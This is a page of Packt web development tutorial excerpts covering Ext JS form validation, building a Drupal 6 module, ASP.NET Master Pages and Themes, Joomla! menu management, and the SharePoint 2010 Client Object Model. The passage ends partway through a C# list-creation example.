How-To Tutorials - Web Development

1797 Articles

Load, Validate, and Submit Forms using Ext JS 3.0: Part 1

Packt
17 Oct 2011
6 min read
Specifying the required fields in a form

This recipe uses a login form as an example to explain how to create required fields in a form.

How to do it...

1. Initialize the global QuickTips instance:

    Ext.QuickTips.init();

2. Create the login form:

    var loginForm = {
        xtype: 'form',
        id: 'login-form',
        bodyStyle: 'padding:15px; background:transparent',
        border: false,
        url: 'login.php',
        items: [
            { xtype: 'box', autoEl: { tag: 'div', html: '<div class="app-msg"><img src="img/magic-wand.png" class="app-img" /> Log in to The Magic Forum</div>' } },
            { xtype: 'textfield', id: 'login-user', fieldLabel: 'Username', allowBlank: false },
            { xtype: 'textfield', id: 'login-pwd', fieldLabel: 'Password', inputType: 'password', allowBlank: false }
        ],
        buttons: [
            { text: 'Login', handler: function() { Ext.getCmp('login-form').getForm().submit(); } },
            { text: 'Cancel', handler: function() { win.hide(); } }
        ]
    }

3. Create the window that will host the login form:

    Ext.onReady(function() {
        win = new Ext.Window({
            layout: 'form',
            width: 340,
            autoHeight: true,
            closeAction: 'hide',
            items: [loginForm]
        });
        win.show();
    });

How it works...

Initializing the QuickTips singleton allows the form's validation errors to be shown as tool tips. When the form is created, each required field needs to have the allowBlank configuration option set to false:

    { xtype: 'textfield', id: 'login-user', fieldLabel: 'Username', allowBlank: false },
    { xtype: 'textfield', id: 'login-pwd', fieldLabel: 'Password', inputType: 'password', allowBlank: false }

Setting allowBlank to false activates a validation rule that requires the length of the field's value to be greater than zero.

There's more...

Use the blankText configuration option to change the error text shown when the blank validation fails. For example, the username field definition in the previous code snippet can be changed as shown here:

    { xtype: 'textfield', id: 'login-user', fieldLabel: 'Username', allowBlank: false, blankText: 'Enter your username' }

Validation rules can be combined and even customized. Other recipes in this article explain how to range-check a field's length, as well as how to specify the valid format of the field's value.

See also...

• The next recipe, Setting the minimum and maximum length allowed for a field's value, explains how to restrict the number of characters entered in a field
• The Changing the location where validation errors are displayed recipe, covered later in this article, shows how to relocate a field's error icon
• The Deferring field validation until form submission recipe, covered later in this article, explains how to validate all fields at once upon form submission, instead of using the default automatic field validation
• The Creating validation functions for URLs, email addresses, and other types of data recipe, covered later in this article, explains the validation functions available in Ext JS
• The Confirming passwords and validating dates using relational field validation recipe, covered later in this article, explains how to perform validation when the value of one field depends on the value of another field
• The Rounding up your validation strategy with server-side validation of form fields recipe, covered later in this article, explains how to perform server-side validation

Setting the minimum and maximum length allowed for a field's value

This recipe shows how to set the minimum and maximum number of characters allowed for a text field.
The way to specify a custom error message for this type of validation is also explained. The login form built in this recipe has username and password fields whose lengths are restricted.

How to do it...

1. Initialize the QuickTips singleton:

    Ext.QuickTips.init();

2. Create the login form:

    var loginForm = {
        xtype: 'form',
        id: 'login-form',
        bodyStyle: 'padding:15px; background:transparent',
        border: false,
        url: 'login.php',
        items: [
            { xtype: 'box', autoEl: { tag: 'div', html: '<div class="app-msg"><img src="img/magic-wand.png" class="app-img" /> Log in to The Magic Forum</div>' } },
            { xtype: 'textfield', id: 'login-user', fieldLabel: 'Username', allowBlank: false, minLength: 3, maxLength: 32 },
            { xtype: 'textfield', id: 'login-pwd', fieldLabel: 'Password', inputType: 'password', allowBlank: false, minLength: 6, maxLength: 32, minLengthText: 'Password must be at least 6 characters long.' }
        ],
        buttons: [
            { text: 'Login', handler: function() { Ext.getCmp('login-form').getForm().submit(); } },
            { text: 'Cancel', handler: function() { win.hide(); } }
        ]
    }

3. Create the window that will host the login form:

    Ext.onReady(function() {
        win = new Ext.Window({
            layout: 'form',
            width: 340,
            autoHeight: true,
            closeAction: 'hide',
            items: [loginForm]
        });
        win.show();
    });

How it works...

After initializing the QuickTips singleton, which allows the form's validation errors to be shown as tool tips, the form is built. The form is an instance of Ext.form.FormPanel. The username and password fields have their lengths restricted by way of the minLength and maxLength configuration options:

    { xtype: 'textfield', id: 'login-user', fieldLabel: 'Username', allowBlank: false, minLength: 3, maxLength: 32 },
    { xtype: 'textfield', id: 'login-pwd', fieldLabel: 'Password', inputType: 'password', allowBlank: false, minLength: 6, maxLength: 32, minLengthText: 'Password must be at least 6 characters long.' }

Notice how the minLengthText option is used to customize the error message that is displayed when the minimum length validation fails. As a last step, the window that will host the form is created and displayed.

There's more...

You can also use the maxLengthText configuration option to specify the error message shown when the maximum length validation fails (see the short example after the See also list below).

See also...

• The previous recipe, Specifying the required fields in a form, explains how to make some form fields required
• The next recipe, Changing the location where validation errors are displayed, shows how to relocate a field's error icon
• The Deferring field validation until form submission recipe (covered later in this article) explains how to validate all fields at once upon form submission, instead of using the default automatic field validation
• The Creating validation functions for URLs, email addresses, and other types of data recipe (covered later in this article) explains the validation functions available in Ext JS
• The Confirming passwords and validating dates using relational field validation recipe (covered later in this article) explains how to perform validation when the value of one field depends on the value of another field
• The Rounding up your validation strategy with server-side validation of form fields recipe (covered later in this article) explains how to perform server-side validation
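As a quick illustration of the maxLengthText option mentioned in the There's more section above, here is a minimal sketch; the field definition mirrors the username field from the recipe, but the message text is only an example, not code from the book:

    {
        xtype: 'textfield',
        id: 'login-user',
        fieldLabel: 'Username',
        allowBlank: false,
        minLength: 3,
        maxLength: 32,
        // Shown as a tool tip when more than 32 characters are entered
        maxLengthText: 'Usernames cannot be longer than 32 characters.'
    }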

Creating Our First Module using Drupal 6 (Part 1)

Packt
12 Oct 2011
8 min read
Starting Out

Our first module is going to fetch XML data from Goodreads, a free social networking site for avid readers. There, users track the books they are reading and have read, rate books and write reviews, and share their reading lists with friends. Reading lists at Goodreads are stored in bookshelves, which are accessible over a web-based XML/RSS API. We will use that API to display a reading list on the Philosopher Bios website (our example website).

To integrate the Goodreads information in Drupal, we will create a small module. Since this is our first module, we will go into greater detail.

A Place for the Module

In Drupal, every module is contained in its own directory. This simplifies organization; all of the module's files are located in one place. To keep naming consistent throughout the module (a standard in Drupal), we will name our directory with the module name. Later, we will install this module in Drupal, but for development, the module directory can be wherever it is most convenient. Once we have created a directory named goodreads, we can start creating files for our module. The first file we need to create is the .info (dot-info) file.

Creating a .info File

Before we start coding our new module, we need to create a simple text file that will hold some basic information about our module. Various Drupal components use the information in this file for module management. The .info file is written as a PHP INI file, which is a simple configuration file format. If you are interested in the details of INI file processing, you can visit http://php.net/manual/en/function.parse-ini-file.php for a description of this format and how it can be parsed in PHP.

Our .info file will only be five lines long, which is probably about average. The .info file must follow the standard naming convention for modules: it must be named <modulename>.info, where <modulename> is the same as the directory name. Our file, then, will be called goodreads.info. Following are the contents of goodreads.info:

    ; $Id$
    name = "Goodreads Bookshelf"
    description = "Displays items from a Goodreads Bookshelf"
    core = 6.x
    php = 5.1

This file isn't particularly daunting. The first line of the file is, at first glance, the most cryptic. However, its function is mundane: it is a placeholder for Drupal's CVS server. Drupal, along with its modules, is maintained on a central CVS (Concurrent Versions System) server. CVS is a version control system that tracks revisions to code over time. One of its features is its ability to dynamically insert version information into a file. However, it needs to know where to insert the information. The placeholder for this is the special string $Id$. But since this string isn't actually a directive in the .info file, it is commented out with the PHP INI comment character, ; (semicolon). You can insert comments anywhere in your .info file by beginning a line with the ; character.

The next four directives each provide module information to Drupal. The name directive provides a human-readable display name for the module. In the module administration screen, for example, the names Aggregator and Blog are taken from the values of the name directives in those modules' .info files. While making the module's proper name short and concise is good (as we did when naming the module directory goodreads above), the display name should be helpful to the user. That usually means that it should be a little longer, and a little more descriptive.
However, there is no need to jam all of the module information into the name directive. The description directive is a good place for providing a sentence or two describing the module's function and capabilities.

The third directive is the core directive. The core and php directives are new in Drupal 6. The core directive specifies which version of Drupal is required for this module to function properly. Our value, 6.x, indicates that this module will run on Drupal 6 (including its minor revisions). In many cases, the Drupal packager will be able to set this automatically (and correctly), but Drupal developers suggest that this directive be set manually by those who work from CVS. Finally, the php directive makes it possible to specify a minimum version requirement for PHP. PHP 5, for example, has many features that are missing in PHP 4 (and the modules in this book make use of such features). For that reason, we explicitly note that our modules require at least PHP version 5.1.

That's all there is to our first .info file. What we have here is sufficient for our Goodreads module. Now, we are ready to write some PHP code.

A Basic .module File

There are two files that every module must have (though many modules have more). The first, the .info file, we examined above. The second is the .module (dot-module) file, which is a PHP script. This file typically implements a handful of hook functions that Drupal will call at pre-determined times during a request. Here, we will create a .module file that will display a small formatted section of information. Later in this article, we will configure Drupal to display this information to site visitors.

Our Goal: A Block Hook

For our very first module, we will implement the hook_block() function. In Drupal parlance, a block is a chunk of auxiliary information that is displayed on a page alongside the main page content. Sounds confusing? An example might help. Think of your favorite news website. On a typical article page, the text of the article is displayed in the middle of the page. But on the left and right sides of the page, and perhaps at the top and bottom as well, there are other bits of information: a site menu, a list of links to related articles, links to comments or forums about this article, and so on. In Drupal, these extra pieces are treated as blocks. The hook_block() function isn't just for displaying block contents, though. In fact, this function is responsible for displaying the block and providing all the administration and auxiliary functions related to this block. Don't worry... we'll start out simply and build up from there.

Starting the .module

Drupal follows rigorous coding and documentation standards (http://drupal.org/coding-standards). In this article, we will do our best to follow them. So as we start our module, the first thing we are going to do is provide some API documentation. Just as with the .info file, the .module file should be named after the module. Following is the beginning of our goodreads.module file:

    <?php
    // $Id$

    /**
     * @file
     * Module for fetching data from Goodreads.com.
     *
     * This module provides block content retrieved from a
     * Goodreads.com bookshelf.
     *
     * @see http://www.goodreads.com
     */

The .module file is just a standard PHP file, so the first line is the opening of the PHP processing instruction: <?php. Throughout this article you may notice something: while all of our PHP libraries begin with the <?php opening, none of them end with the closing ?> characters.
This is intentional; in fact, it is not just intentional but conventional for Drupal. As much as it might offend your well-formed markup language sensibilities, it is good coding practice to omit the closing characters for a library. Why? Because it avoids printing whitespace characters in the script's output, and that can be very important in some cases. For example, if whitespace characters are output before HTTP headers are sent, the client will see ugly error messages at the top of the page.

After the PHP tag is the keyword for the version control system:

    // $Id$

When the module is checked into the Drupal CVS, information about the current revision is placed here.

The third part of this example is the API documentation. API documentation is contained in a special comment block, which begins with /** and ends with */. Everything between these is treated as documentation. Special extraction programs such as Doxygen (http://www.stack.nl/~dimitri/doxygen/) can pull out this information and create user-friendly programming information; the Drupal API reference is generated from the API comments located in Drupal's source code.

The majority of the content in these documentation blocks (docblocks, for short) is simply text, but there are a few additions. First, there are special identifiers that provide the documentation-generating program with additional information. These are typically prefixed with an @ sign:

    /**
     * @file
     * Module for fetching data from Goodreads.com.
     *
     * This module provides block content retrieved from a
     * Goodreads.com bookshelf.
     *
     * @see http://www.goodreads.com
     */

In the above example, there are two such identifiers. The @file identifier tells the documentation processor that this comment describes the entire file, not a particular function or variable inside the file. The first comment in every Drupal PHP file should, by convention, be a file-level comment. The other identifier in the example is the @see keyword. This instructs the documentation processor to attempt to link this file to some other piece of information; in this case, that piece of information is a URL. Functions, constants, and variables can also be referents of a @see identifier, in which case the documentation processor will link the docblock to the API information for that function, constant, or variable. With these formalities out of the way, we're ready to start coding our module.
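The excerpt ends before the hook itself appears, so purely as orientation, a minimal Drupal 6 hook_block() implementation for a module named goodreads might look like the following sketch. The block title and placeholder content are illustrative assumptions, not the book's actual code:

    /**
     * Implementation of hook_block().
     *
     * A minimal sketch: the 'list' operation describes the block to the
     * block administration page, and 'view' returns the rendered content.
     */
    function goodreads_block($op = 'list', $delta = 0, $edit = array()) {
      switch ($op) {
        case 'list':
          $blocks = array();
          // Name shown on the admin/build/block page.
          $blocks[0]['info'] = t('Goodreads Bookshelf');
          return $blocks;

        case 'view':
          // Placeholder content; the real module would fetch and
          // format the Goodreads XML feed here.
          $block['subject'] = t('On the Bookshelf');
          $block['content'] = t('Bookshelf items will appear here.');
          return $block;
      }
    }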

ASP.NET 3.5 CMS: Master Pages, Themes, and Menus

Packt
12 Oct 2011
13 min read
Master Pages

Earlier you were introduced to a feature called Master Pages, but what exactly are they? The idea behind them is one that's been around since the early days of development: that you can inherit the layout of one page for use in another. It is the idea that has kept many developers scrambling with Includes and User Controls, and this is where Master Pages come into play. They allow you to lay out a page once and use it over and over. By doing this, you can save yourself countless hours of time, and you can maintain the look and feel of your site from a single place. By implementing a Master Page and using ContentPlaceHolders, your page is able to keep its continuity throughout.

You'll see that the Master Page (SimpleCMS.master) looks similar to a standard .aspx page from ASP.NET, but with some slight differences. The <%@...%> declaration has had the Page identifier changed to a Master declaration. Here is a standard web page declaration:

    <%@ Page Language="VB" MasterPageFile="~/SimpleCMS.master" AutoEventWireup="false" CodeFile="Default.aspx.vb" Inherits="_Default" Title="Untitled Page" %>

Here is the declaration for a Master Page:

    <%@ Master Language="VB" CodeFile="SimpleCMS.master.vb" Inherits="SimpleCMS" %>

This tells the underlying ASP.NET framework how to handle this special page. If you look at the code for the page, you will also see that it inherits from System.Web.UI.MasterPage instead of the standard System.Web.UI.Page. They function similarly but, as we will cover in more detail later, they have a few distinct differences.

Now, back to the Master Page. Let's take a closer look at the two existing ContentPlaceHolders. The first one you see on the page is the one with the ID of "head". This is a default item that is added automatically to a new Master Page, and its location is also standard. The system is setting up your page so that any "child" page later on will be able to put things such as JavaScript and style tags into this location. It's within the HTML <head> tag and is handled specially by the client's browser. The control's tag contains a minimal number of properties (in reality only four), along with a basic set of events you can tie to. The reason for this is actually pretty straightforward: it doesn't need anything more. The ContentPlaceHolder controls aren't really meant to do much from a programming standpoint. They are meant to be placeholders where other code is injected from the child pages, and this injected code is where all the "real work" is meant to take place. With that in mind, the system acts more as a pass-through, allowing the ContentPlaceHolders to have as little impact on the rest of the site as possible.

Now, back to the existing page, you will see the second preloaded ContentPlaceHolder (ContentPlaceHolder1). Again, this one is automatically added when a new Master Page is created; its initial position is really just "thrown on the page" when you start out. The idea is that you will position this one, as well as any others you add to the page, in a way that complements the design of your site. You will typically have one for every zone or region of your layout, to allow you to update the contents within. For simplicity's sake, we'll keep to the one-zone approach for the site, and will only use the two existing preloaded ContentPlaceHolders, for now at least. ContentPlaceHolder1 is positioned in the current layout so that it encapsulates the main "body" of the site.
All the child pages will render their content up into this section. With that, you will notice that the areas outside this control are really important to the way the site will not only look but also act. Setting up your site headers (images, menus, and so on) is of the utmost importance. Also, things such as footers, borders, and all the other pieces you will interact with on each page are typically laid out on your Master Page. In the existing example, you will also see the LoginStatus1 control placed directly on the Master Page. This is a great way to share that control, and any code/events you may have tied to it, on every page without having to duplicate your code.

There are a few things to keep in mind when putting things together on your Master Page, the biggest of which is that your child/content page will inherit aspects of your Master Page. Styles, attributes, and layout are just a few of the pieces to keep in mind. Think of the end resulting page as a merger of the Master Page and the child/content page. With that in mind, you can begin to understand that when you add something such as a width to the Master Page, which would be consumed by the children, the child page will be bound by it. For example, when many people set up their Master Page, they will often use a <table> as their defining container. This is a great way to do it and, in fact, is exactly what's done in the example we are working with. Look at the HTML for the Master Page: you will see that the whole page, in essence, is wrapped in a <table> tag and the ContentPlaceHolder is within a <td>. If you were to apply a style attribute to that table and set its width, the children that fill the ContentPlaceHolder would be restricted to working within the confines of that predetermined size. This is not necessarily a bad thing. It makes it easier to work with the child pages in that you don't have to worry about defining their sizes (it's already done for you) and, at the same time, it lets you handle all the children from this one location. It can also restrict you for those exact same reasons. You may want a more dynamic approach, and hard-setting these attributes on the Master Page may not be what you are after. These are factors you need to think about before you get too far into the design of your site.

Now that you've got a basic understanding of what Master Pages are and how they can function on a simple scale, let's take a look at the way they are used from the child/content page. Look at Default.aspx (HTML view). You will notice that this page looks distinctly different from a standard page (one with no Master Page). Here is what a page looks like when you first add it, with no Master Page:

    <%@ Page Language="VB" AutoEventWireup="false" CodeFile="Default2.aspx.vb" Inherits="Default2" %>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html>
    <head runat="server">
        <title>Untitled Page</title>
    </head>
    <body>
        <form id="form1" runat="server">
        <div>
        </div>
        </form>
    </body>
    </html>

Compare this to a new Web Form when you select a Master Page:
    <%@ Page Language="VB" MasterPageFile="~/SimpleCMS.master" AutoEventWireup="false" CodeFile="Default2.aspx.vb" Inherits="Default2" Title="Untitled Page" %>
    <asp:Content ID="Content1" ContentPlaceHolderID="head" Runat="Server">
    </asp:Content>
    <asp:Content ID="Content2" ContentPlaceHolderID="ContentPlaceHolder1" Runat="Server">
    </asp:Content>

You will see right away that all the common HTML tags are missing from the page with a Master Page selected. That's because all of these common pieces are handled in, and rendered from, the Master Page. You will also notice that the page with a Master Page has an additional default attribute in its page declaration: the Title attribute is added so that, when merged and rendered with the Master Page, the page gets the proper title displayed. In addition to the differences in the declaration tag and the absence of the common HTML tags, the two ContentPlaceHolder tags we defined on the Master Page are automatically referenced through the use of a Content control. These Content controls tie directly to the ContentPlaceHolder tags on the Master Page through the ContentPlaceHolderID attribute. This tells the system where to put the pieces when rendering. The basic idea is that anything between the opening and closing tags of the Content control will be rendered out to the page when it is requested by a browser.

Themes

Themes are an extension of another idea, like Master Pages, that has kept developers working long hours: how do you quickly change the look and feel of your site for different users or usages? This is where Themes come in. Themes can be thought of as containers where you store your style sheets, images, and anything else that you may want to interchange in the visual pieces of your site. Themes are folders where you put all of these pieces to group them together. While one user may be visiting your site and seeing it one way, another user can be viewing the exact same site but getting a completely different experience.

Let's start off by enabling our site to include the use of Themes. To do this, right-click on the project in the Solution Explorer, select Add ASP.NET Folder, and then choose Theme from the submenu. The folder will default to Theme1 as its name. I'd suggest that you name it something friendlier, though. For now, we will call the Theme "SimpleCMSTheme"; later on you may want to add another Theme, and giving your folders descriptive names will really help you keep your work organized. You will see that a Theme is really nothing more than a folder for organizing all the pieces.

Let's take a look at what options are available to us. Right-click on the SimpleCMSTheme folder we just created and select Add New Item. The available items may vary depending on your installation, but the key items here are Skin File and Style Sheet. You may already be familiar with stylesheets if you've done any web design work, but let's do a little refresher just in case. Stylesheets, among other uses, are a way to organize all the attributes for your HTML tags. This is really the key feature of stylesheets. You will often see them referred to as CSS, which stands for Cascading Style Sheets (explained in more detail shortly); .css is also the file extension used when adding a stylesheet to your application. Let's go ahead and add a Style Sheet to our site.
For our example, we'll use the default name StyleSheet.css that the system selects. The system will preload your new stylesheet with one element, the body{} element. Let's add a simple attribute to this element. Put your cursor between the open "{" and close "}" brackets and press Ctrl+Space, and you should get the IntelliSense menu. This is a list of the attributes that the system acknowledges for your element tag. For our testing, let's select the background-color attribute and give it a value of Blue. It should look like this when you are done:

    body
    {
        background-color: Blue;
    }

Go ahead, save your stylesheet, run the site, and see what happens. If you didn't notice any difference, that's because even though we've now created a Theme for the site and added an attribute to the body element, we've never actually told the site to use this new Theme. Open your web.config and find the <pages> element. It should be located in the <configuration><system.web> section. Select the <pages> element and put your cursor right after the "s". Press the spacebar and the IntelliSense menu should appear. You will see a long list of available items, but the item we are interested in for now is theme. Select it and you will be prompted to enter a value. Put in the name of the Theme we created earlier:

    <pages theme="SimpleCMSTheme">

We've now assigned this Theme to our site with one simple line of text. Save your changes, run the site again, and see what happens. The body element we added to our stylesheet is now read by the system and applied appropriately. View the source of your page and look at how this was applied. The following line is now part of your rendered code:

    <link href="App_Themes/SimpleCMSTheme/StyleSheet.css" type="text/css" rel="stylesheet" />

Now that we've seen how to apply a Theme and how to use a stylesheet within it, let's look at one of the other key features of a Theme: the Skin file. A Skin file can be thought of as pre-setting a set of parameters for the controls in your site. It lets you configure multiple attributes in order to give a certain look and feel to a control, so that you can quickly reuse it at any time. Let's jump right in and take a look at how it works. Right-click on the SimpleCMSTheme folder we created and select the Skin File option. Go ahead and use the default name of SkinFile.skin for this example. You should get a file like this:

    <%--
    Default skin template. The following skins are provided as examples only.

    1. Named control skin. The SkinId should be uniquely defined because
       duplicate SkinId's per control type are not allowed in the same theme.

    <asp:GridView runat="server" SkinId="gridviewSkin" BackColor="White" >
        <AlternatingRowStyle BackColor="Blue" />
    </asp:GridView>

    2. Default skin. The SkinId is not defined. Only one default
       control skin per control type is allowed in the same theme.

    <asp:Image runat="server" ImageUrl="~/images/image1.jpg" />
    --%>

We now have the default Skin file for our site, and Microsoft has even provided a great sample for us. What you see in the example could be translated to say that any GridView added to the site, with either no SkinID specified or with a SkinID of gridviewSkin, will use this skin. In doing so, these GridViews will all use a BackColor of White and an AlternatingRowStyle BackColor of Blue.
By putting this in a Skin file as part of our Theme, we can apply these attributes, along with many others, to all such controls at one time. This can really save you a lot of development time. As we design the rest of the CMS site, we will continue to revisit these Theme principles and expand on them, so it is good to keep their functionality in mind as we go along.
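To make the skin/control relationship concrete, here is a small illustrative sketch (not taken from the book's sample project) of a named skin and a page-level GridView that opts into it via SkinID once the theme is enabled in web.config; the control ID and skin contents are placeholder values:

    <%-- In App_Themes/SimpleCMSTheme/SkinFile.skin: a named GridView skin (no ID attribute allowed here) --%>
    <asp:GridView runat="server" SkinId="gridviewSkin" BackColor="White">
        <AlternatingRowStyle BackColor="Blue" />
    </asp:GridView>

    <%-- In a content page: this GridView picks up the skin's colors automatically --%>
    <asp:GridView ID="NewsGrid" runat="server" SkinID="gridviewSkin" />

Because the skin is resolved through the Theme, changing the colors in SkinFile.skin later restyles every GridView that references gridviewSkin without touching the individual pages.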

Customizing the Menus Menu in Joomla!

Packt
12 Oct 2011
8 min read
The Top Menu is a horizontal menu; the other menus are vertical. Each menu is coupled with a so-called module, which is administered in the module manager.

Menus

By clicking on this menu item, you get an overview of the available menus. You can also access the content of these menus by means of the menu bar (Menus | Main Menu, Top Menu) or by clicking the respective menu link in the overview. This Menu Manager serves as an overview and shows you the number of Published and Unpublished menu items, the number of menu items that are in the Trash can, and the respective menu ID. In this section you can, for instance, copy a menu or create a new one.

Customizing an Existing Menu

Experiment a little with the menus to get a feel for things. The following edit steps are the same for all the menus. Go to the menu item Menus | Main Menu. You will see a listing of the menu items that appear in the mainmenu. Several functions can be executed in the table with a simple mouse click. By clicking on the checkmark, you can enable or disable a menu link. You can change the order of the items by clicking on the triangles or by typing numbers into the fields under Order; if you use the numbers method, you have to click on the disk symbol in the header to make the change effective. In the Access Level column, a mouse click lets you decide whether the menu item is available to all users (Public), only to registered users (Registered), or only to a particular circle of users (Special). The menu items are then displayed or hidden depending on the user's rights.

Menus Icon

If you click on this icon, you are taken to the menu overview screen.

Default Icon

The menu item that is marked as default here with a star is displayed as the start page when someone calls up the URL of your website. At the moment this is the menu item Home, but you can designate any element that you want as the start page. Just mark the checkbox and click on the Default icon.

Publish/Unpublish Icon

The status of a content element can either be published (activated) or unpublished (deactivated). You can toggle this status individually by clicking the green checkmark and/or the red cross, or by marking the checkbox and subsequently clicking on the appropriate icon. If you follow the latter method, you can toggle several menu items at the same time.

Move Icon

This entails the moving of menu entries. Let's move the item More about Joomla! into the Top Menu. Select the respective menu element, or even several menu elements, and click the Move icon. This opens a form listing the available menus; on the right you will see the elements that you want to move. Select the menu into which you would like to move the marked menu items. Here, we have moved More about Joomla! from the Main Menu into the Top Menu. You can admire the results in the front end.

Copy Icon

You can also copy menu items. To do that, select one or more menu items and click on the Copy icon. Just as with moving, a form with the available menus opens. Select the menu into which you want to copy the marked menu entries.

Trash Icon

To protect you from inadvertently deleting items, you cannot delete them immediately when editing; you can only throw them into the trash. To do so, select one or several menu elements and click on the Trash icon. The marked menu items are then dumped into the trash can. You can display the content of the trash can by clicking on Menus | Menu Trash.
Edit Icon (Edit Menu Items)

Here you can modify an existing menu item, for instance Web Links. After clicking on the name Web Links, you will see the edit form for menu elements. The form is divided into three parts: Menu Item Type, Menu Item Details, and Parameters.

Menu Item Type

Every menu item is of a particular type. We will go into greater detail when we create new menus. For instance, a menu item can refer to an installed Joomla! component, a content element, a link to an external website, or many other things. You can see what the type of the link is in this section; in our case it is a link to the Joomla! weblinks component, and you can also see a button with the label Change Type. If you click on that button, you get a type-selection screen. This manager is new in Joomla! version 1.5 and really handy; in version 1.0.x there was no option to change the type of a menu item, so you had to delete the old menu item and create a new one. Now you can change the display to a single category, or to a link-suggestion menu item with which you invite other users to suggest links. Close this for now; we will get back to it when we create a new menu.

Menu Item Details

This section contains the following options:

• ID: Everything in an administration requires an ID number, and so does our menu item. In this case the menu item has the ID number 48. Joomla! assigns this number for internal administration purposes at the time the item is created. This number cannot be changed.
• Title: This is the name of the menu item, and it will be displayed that way on your website.
• Alias: This is the name used in the search-engine friendly URL after the domain name. When this is enabled, the URL for this menu item will look as follows: http://localhost/joomla150/web-links
• Link: This is the request for a component, in other words the part of the URL after the domain name with which you call up your website. In this case it is index.php?option=com_weblinks&view=categories
• Display in: With this you can change the place where the item is displayed; in other words, you can move it to another menu. The options field presents you with a list of the available menus.
• Parent Item: Of course, menus can also contain nested, tree-like items. Top means that the item is at the uppermost level; the rest of the entries represent existing menu items. If, for instance, you classify and save Web Links under The News, the display on the item list and the display on your website change: the menu item Web Links moves into The News on your website, so you have to first click on The News in order to see the Web Links item. Your website can easily and effectively be structured in a tree-like manner this way.
• Published: With this you can publish a menu item.
• Order: From the options list, you can select the link after which you want to position this link.
• Access Level: You can restrict which users can see this item.
• On Click, Open in: A very handy option that influences the behavior of the link. After clicking, the page is either opened in the existing window or in a new browser window. You can also define whether the new window will be displayed with or without browser navigation.

Parameters

The possible parameters of a menu item depend on the type of the item. A simple link, of course, has fewer parameters than a configurable list or, for example, the front page link. In this case we have a link to the categories, and the number and type of parameters depend on the type of the menu item.
You can open and collapse the parameter fields by clicking on the header. If the parameter fields are open, the arrow next to the header points down.

Parameters - Basic

The basic parameters are the same for all menu links:

• Image: Here you can specify an image, which must be in the root directory of the media manager (/images/stories/). Depending on the template, this picture is displayed on the left, next to the menu item.
• Image Align: You can decide whether the image should be on the left or the right.
• Show a Feed Link: It is possible to create an RSS feed for every list display in Joomla! 1.5. This could be desirable or undesirable depending on the content of the list. When enabled, an RSS feed link containing the list items is made available in the browser for list displays.

Working with the Client Object Model in Microsoft SharePoint

Packt
05 Oct 2011
9 min read
Microsoft SharePoint 2010 is the best-in-class platform for content management and collaboration. With Visual Studio, developers have an end-to-end business solution development IDE. To leverage this powerful combination of tools, it is necessary to understand the different building blocks of SharePoint. In this article by Balaji Kithiganahalli, author of Microsoft SharePoint 2010 Development with Visual Studio 2010 Expert Cookbook, we will cover:

• Creating a list using the Client Object Model
• Handling exceptions
• Calling the Object Model asynchronously

(For more resources on Microsoft SharePoint, see here.)

Introduction

Since the out-of-the-box web services do not provide the full functionality that the server model exposes, developers always end up creating custom web services for use with client applications. But there are situations where deploying custom web services may not be feasible; for example, your company may be hosting SharePoint solutions in a cloud environment where access to the root folder is not permitted. In such cases, developing client applications with the new Client Object Model (OM) becomes a very attractive proposition. SharePoint exposes three OMs, which are as follows:

• Managed
• Silverlight
• JavaScript (ECMAScript)

Each of these OMs provides an object interface to the functionality exposed in the Microsoft.SharePoint namespace. While none of the Object Models exposes the full functionality of the server-side object model, an understanding of the server Object Model translates easily into developing applications with a client OM.

The Managed OM is used to develop custom .NET managed applications (service, WPF, or console applications). You can also use this OM for ASP.NET applications that are not running in the SharePoint context. The Silverlight OM is used by Silverlight client applications. The JavaScript OM is only available to applications that are hosted inside SharePoint, such as web part pages or application pages.

Even though each of the OMs provides a different programming interface for building applications, behind the scenes they all call a service named Client.svc to talk to SharePoint. This Client.svc file resides in the ISAPI folder. The service calls are wrapped in an Object Model that developers use to make calls to the SharePoint server. Developers make calls against an OM, and the calls are batched together in XML format and sent to the server. The response is always received in JSON format, which is then parsed and associated with the right objects.

The three Object Models come in separate assemblies. Their locations and names are as follows:

• Managed: ISAPI folder - Microsoft.SharePoint.Client.dll and Microsoft.SharePoint.Client.Runtime.dll
• Silverlight: LAYOUTS\ClientBin folder - Microsoft.SharePoint.Client.Silverlight.dll and Microsoft.SharePoint.Client.Silverlight.Runtime.dll
• JavaScript: LAYOUTS folder - SP.js

The Client Object Model can be downloaded as a redistributable package from the Microsoft download center at: http://www.microsoft.com/downloads/en/details.aspx?FamilyID=b4579045-b183-4ed4-bf61-dc2f0deabe47

OM functionality focuses on objects at the site collection level and below, the main reason being that it is intended to enhance end-user interaction. Hence the OM is a smaller subset of what is available through the server Object Model.
In all three Object Models, the main object names are kept the same, and hence knowledge of one OM is easily portable to another. As indicated earlier, knowledge of the server Object Model transfers readily to development with the client OM. The following list shows some of the major objects in the client OM and their equivalents in the server OM:

• ClientContext - SPContext
• Site - SPSite
• Web - SPWeb
• List - SPList
• ListItem - SPListItem
• Field - SPField

Creating a list using a Managed OM

In this recipe, we will learn how to create a list using the Managed Object Model. We will also add a new column to the list and insert about 10 rows of data. For this recipe, we will create a console application that makes use of a generic list template.

Getting ready

You can copy the DLLs mentioned earlier to your development machine. Your development machine need not have the SharePoint server installed, but you should be able to access one with proper permissions. You also need the Visual Studio 2010 IDE installed on the development machine.

How to do it...

1. Launch your Visual Studio 2010 IDE as an administrator (right-click the shortcut and select Run as administrator).
2. Select File | New | Project. The new project wizard dialog box will be displayed (make sure to select .NET Framework 3.5 in the top drop-down box).
3. Select Console Application under the Visual C# | Windows node in the Installed Templates section on the left-hand side.
4. Name the project OMClientApplication, provide a directory location where you want to save the project, and click OK to create the console application template.
5. To add references to Microsoft.SharePoint.Client.dll and Microsoft.SharePoint.Client.Runtime.dll, go to the menu Project | Add Reference, navigate to the location where you copied the DLLs, and select them.
6. Now add the code necessary to create a list. A description field will also be added to our list. Your code should look like the following (make sure to change the URL passed to the ClientContext constructor to your environment):

    using Microsoft.SharePoint.Client;

    namespace OMClientApplication
    {
        class Program
        {
            static void Main(string[] args)
            {
                using (ClientContext clientCtx = new ClientContext("http://intsp1"))
                {
                    Web site = clientCtx.Web;

                    // Create a list.
                    ListCreationInformation listCreationInfo = new ListCreationInformation();
                    listCreationInfo.Title = "OM Client Application List";
                    listCreationInfo.TemplateType = (int)ListTemplateType.GenericList;
                    listCreationInfo.QuickLaunchOption = QuickLaunchOptions.On;
                    List list = site.Lists.Add(listCreationInfo);

